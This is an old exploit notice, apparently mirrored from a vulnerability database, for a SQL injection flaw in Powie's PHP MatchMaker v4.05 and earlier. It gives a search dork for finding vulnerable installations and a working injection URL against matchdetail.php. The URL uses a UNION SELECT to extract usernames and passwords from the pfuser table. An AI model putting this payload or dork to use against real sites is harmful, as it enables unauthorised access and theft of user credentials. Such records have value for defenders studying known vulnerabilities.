Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit

2006-11-1800:00:00

vulners.com

#==============================================================================================
#Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://www.powie.de

#Version : v4.05

#===============================================================================================

#DORK : "Powie's PSCRIPT MatchMaker 4.05"

#Exploit :
#--------------------------------

#http://target.com/(path to script)/matchdetail.php?edit=-1 UNION SELECT 0,0,0,pwd,0,0,0,0,0,username,0,0,0,0 FROM pfuser WHERE id=1

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo

sPECial THanks to : CaMpA , Coder-AZH@CKTEAM

==================================================================================================

JSON

Powie&#39;s PHP MatchMaker &lt;= v4.05 &#40;matchdetail&#41; Remote SQL Injection Exploit

sPECial THanks to : CaMpA , Coder-AZH@CKTEAM

Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit